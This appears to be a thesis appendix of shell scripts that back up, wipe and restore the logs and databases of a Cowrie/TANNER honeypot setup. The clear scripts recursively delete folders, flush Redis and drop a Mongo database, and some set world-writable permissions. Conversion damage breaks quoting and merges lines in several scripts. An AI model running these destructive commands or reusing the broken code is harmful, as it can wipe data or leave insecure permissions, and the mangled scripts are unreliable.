define('DB_NAME', 'cowrie');
define('DB_PORT', '3306');

Maxmind
define('GEO_METHOD', 'LOCAL');
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APPENDIX F. USEFUL SCRIPTS

These scripts are placed in the /usr/local/bin folder on the respective machines and are run manually when we need to perform the required job.

Backup script on SNARE and Cowrie virtual machine

cd ~
mkdir -p backup
cd backup

echo ""

```
-------
Performing Cowrie Logs Backup--------
-------

Backup existing logs to cowrie_log.YYYYMMDD_HHMM.tgz at home backup folder
```

```
sudo tar czf cowrie_log.$(date +%Y%m%d_%H%M).tgz /home/nginx/cowrie/log
sudo tar czf cowrie_dl.$(date +%Y%m%d_%H%M).tgz /home/nginx/cowrie/dl
```

```
 echo "Cowrie Logs and Download backup completed"
```

```'

```
 echo "Remember to type "sudo clearall" to clear logs"
```

Clear data script on SNARE and Cowrie virtual machine

```
#!/bin/bash

echo

- n "Have you done the backup? Press Ctrl - C to exit if you haven't"
read

```

```
 echo ""
 echo "-------- Clearing Cowrie Logs --------"
```

```
 echo "Clearing the tty logs folder"
 sudo rm /home/nginx/cowrie/log/* -Rf
sudo mkdir -p /home/nginx/cowrie/log/tty
sudo chown nginx:nginx /home/nginx/cowrie/log/tty
sudo chmod 755 /home/nginx/cowrie/log/tty
```

```
 echo "Cowrie Logs cleared"
```

```
 echo ""
 echo "Clearing the download folder"
 sudo rm /home/nginx/cowrie/dl/* -Rf
```

```
 echo "Cowrie Logs cleared"
```

```
 echo "Cowrie Downloads cleared"
```
Backup script on TANNER and database virtual machine

cd ~
mkdir -p backup
cd backup
echo "--------Performing Cowrie Database Backup--------"
echo "Performing SQL dump, backup to cowrie_db.YYYYMMDD HHMM.sql at home backup folder"
echo "Enter your password to Cowrie Database"
mysqldump -u cowrie -p cowrie > cowrie_db.$(date +%Y%m%d_%H%M).sql

echo "--------Performing Cowrie Logs Backup--------"
echo "Backup existing logs to cowrie_log.YYYYMMDD HHMM.tgz at home backup folder"
sudo tar czf cowrie_log.$(date +%Y%m%d_%H%M).tgz /home/chong/cowrie/log
sudo tar czf cowrie_dl.$(date +%Y%m%d_%H%M).tgz /home/chong/cowrie/dl
echo "Cowrie Logs backup completed"

echo """"
echo "--------Performing Tanner Mongo Database Backup--------"
echo "Backup Tanner Mongo Database to tanner_mongo_db.YYYYMMDD HHMM.archive at home backup folder"
cd /home/chong/backup
cd /home/chong/backup
sudo service mongod start
sudo mongodump --archive=tanner_mongo_db.$(date +%Y%m%d_%H%M).archive --db tanner
echo "Tanner Mongo Database backup completed"

echo """
echo "--------Performing Tanner Redis Database Backup --------"
echo "Backup Tanner Redis Database to tanner_redis_db.YYYYMMDD HHMM.rdb at home backup folder"
sudo cp /var/lib/redis/dump.rdb /home/chong/backup/tanner_redis_db.$(date +%Y%m%d_%H%M).rdb
echo "Tanner Redis Database backup completed"

echo "Remember to clear the logs using 'sudo clearall'"

Clear data script on TANNER and database virtual machine

#!/bin/bash

echo -n "Have you done the backup? Press Ctrl - C to exit if you haven't"
read

echo """
echo "-------- Clearing Cowrie Database --------"

echo "Clearing the Cowrie Database"
echo "Enter your password to Cowrie Database"
mysql -u cowrie -p cowrie < /home/chong/cowrie/doc/sql/cowrie_fresh_db.sql
echo "Cowrie Database cleared"

echo """" echo "-------- Clearing Cowrie Logs --------" echo "Clearing the tty logs folder" sudo rm /home/chong/cowrie/log/* -Rf sudo mkdir -p /home/chong/cowrie/log/tty sudo chmod 777 /home/chong/cowrie/log/tty echo "Cowrie Logs cleared"

echo """" echo "-------- Clearing Cowrie Downloads --------" echo "Clearing the download folder" sudo rm /home/chong/cowrie/dl/* -Rf sudo mkdir -p /home/chong/cowrie/dl sudo chmod 777 /home/chong/cowrie/dl echo "Cowrie Downloads cleared"


echo """" echo "-------- Clearing Tanner Mongo Database --------" echo "Clearing the Tanner Mongo Database" sudo mongo tanner --eval "printjson(db.dropDatabase())" echo "Tanner Mongo Database cleared"

echo """" echo "-------- Clearing Tanner Redis Database --------" echo """" echo "Clearing the Tanner Redis Database" sudo redis-cli flushall echo "Tanner Redis Database cleared"

Restore script on TANNER and database virtual machine
#!/usr/bin/env bash
if [ -z "$1" ]
then {
    echo "Usage: sudo restore YYYYMMDD_HHMM"
}

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else {
    date=$1
    echo "--------Restoring Cowrie Database--------"
    echo "Enter your Cowrie account password"
    mysql -u cowrie -p cowrie < /home/chong/backup/cowrie_db.$date.sql
    echo "Cowrie Database restore completed!"

    echo"
    echo "--------Restoring Cowrie Logs--------"
    cd /
    sudo cp /home/chong/backup/cowrie_log.$date.tgz .
    sudo tar xzf cowrie_log.$date.tgz
    sudo rm cowrie_log.$date.tgz
    echo "Restore Cowrie Logs completed!"

    echo"
    echo "--------Restoring Cowrie Downloads--------"
    cd /
    sudo cp /home/chong/backup/cowrie_dl.$date.tgz .
    sudo tar xzf cowrie_dl.$date.tgz
    sudo rm cowrie_dl.$date.tgz
    echo "Restore Cowrie Database completed!"

    echo"
    echo "--------Restoring Tanner Mongo Database--------"
    sudo mongorestore --archive=/home/chong/backup/tanner_mongo_db.$date.archive --db tanner
    echo "Restore Tanner Mongo Database completed!"

    echo"
    echo "--------Restoring Tanner Redis Database--------"
    sudo service redis-server stop
    sudo cp -p /home/chong/backup/tanner_redis_db.$date.rdb /var/lib/redis/dump.rdb
    sudo chown redis:redis /var/lib/redis/dump.rdb
    sudo chmod 660 /var/lib/redis/dump.rdb
    sudo service redis-server start
    echo "Restore Tanner Redis Database completed!"
}
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LIST OF REFERENCES


INITIAL DISTRIBUTION LIST

1. Defense Technical Information Center
   Ft. Belvoir, Virginia

2. Dudley Knox Library
   Naval Postgraduate School
   Monterey, California